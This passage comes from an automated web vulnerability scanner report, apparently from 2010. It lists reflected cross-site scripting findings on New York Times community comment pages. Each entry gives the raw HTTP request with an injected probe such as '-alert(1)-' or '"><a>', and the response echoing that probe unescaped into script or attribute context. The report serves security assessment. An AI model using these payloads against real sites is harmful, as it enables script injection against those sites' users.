User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71869

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Play Ab
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments95f3f'-alert(1)-'ada34236929';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.86. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9161"><a>5ab015563d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentse9161"><a>5ab015563d1/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71781

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Play Ab
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentse9161"><a>5ab015563d1/artsbeat.blogs.nytimes.com/yr/mo/day/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetprom
...[SNIP]...

3.87. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71c9"><a>1e34a4fd54a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comb71c9"><a>1e34a4fd54a/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34447

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Play Ab
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comb71c9"><a>1e34a4fd54a/yr/mo/day/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLin
...[SNIP]...

3.88. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bca7"-alert(1)-"2319875f975 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/?6bca7"-alert(1)-"2319875f975=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71297

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Play Ab
...[SNIP]...
";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142601";
var s_pagename = "2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/?6bca7"-alert(1)-"2319875f975=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.89. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51860"><a>6eafaae01f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments51860"><a>6eafaae01f/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 84159

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>'Spider
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments51860"><a>6eafaae01f/artsbeat.blogs.nytimes.com/yr/mo/day/spider-man-musical-teams-with-syfy-channel/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,S
...[SNIP]...

3.90. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc00'-alert(1)-'307dd572ea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments1bc00'-alert(1)-'307dd572ea0/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 84201

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>'Spider
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments1bc00'-alert(1)-'307dd572ea0';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.91. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5a8f"><a>014e8107919 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comc5a8f"><a>014e8107919/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33806

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>'Spider
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comc5a8f"><a>014e8107919/yr/mo/day/spider-man-musical-teams-with-syfy-channel/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom
...[SNIP]...

3.92. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f46b3"-alert(1)-"68d72677370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/?f46b3"-alert(1)-"68d72677370=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 81567

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>'Spider
...[SNIP]...
mesglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142483";
var s_pagename = "2010/11/11/spider-man-musical-teams-with-syfy-channel/?f46b3"-alert(1)-"68d72677370=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.93. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4241c'-alert(1)-'33ecf65d4eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments4241c'-alert(1)-'33ecf65d4eb/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 120080

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tangled
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments4241c'-alert(1)-'33ecf65d4eb';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.94. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78489"><a>817c3be883f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments78489"><a>817c3be883f/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 120314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tangled
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments78489"><a>817c3be883f/artsbeat.blogs.nytimes.com/yr/mo/day/tangled-web-of-rubicon-unravels-at-amc/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponL
...[SNIP]...

3.95. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d7d"><a>64403273679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comb8d7d"><a>64403273679/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33735

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tangled
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comb8d7d"><a>64403273679/yr/mo/day/tangled-web-of-rubicon-unravels-at-amc/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bo
...[SNIP]...

3.96. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb13"-alert(1)-"3ff71f84a46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/?adb13"-alert(1)-"3ff71f84a46=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 111743

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tangled
...[SNIP]...
nytimesglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142657";
var s_pagename = "2010/11/11/tangled-web-of-rubicon-unravels-at-amc/?adb13"-alert(1)-"3ff71f84a46=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.97. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 683a8"><a>11401750f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments683a8"><a>11401750f9d/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71155

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Re
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments683a8"><a>11401750f9d/artsbeat.blogs.nytimes.com/yr/mo/day/book-review-podcast-the-emperor-of-all-maladies/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpro
...[SNIP]...

3.98. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d604c'-alert(1)-'959e8c51a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commentsd604c'-alert(1)-'959e8c51a4/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Re
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'commentsd604c'-alert(1)-'959e8c51a4';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.99. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0ae8"><a>8de1386f669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comd0ae8"><a>8de1386f669/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34121

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Re
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comd0ae8"><a>8de1386f669/yr/mo/day/book-review-podcast-the-emperor-of-all-maladies/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,B
...[SNIP]...

3.100. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39b70"-alert(1)-"15696141ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/?39b70"-alert(1)-"15696141ef9=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
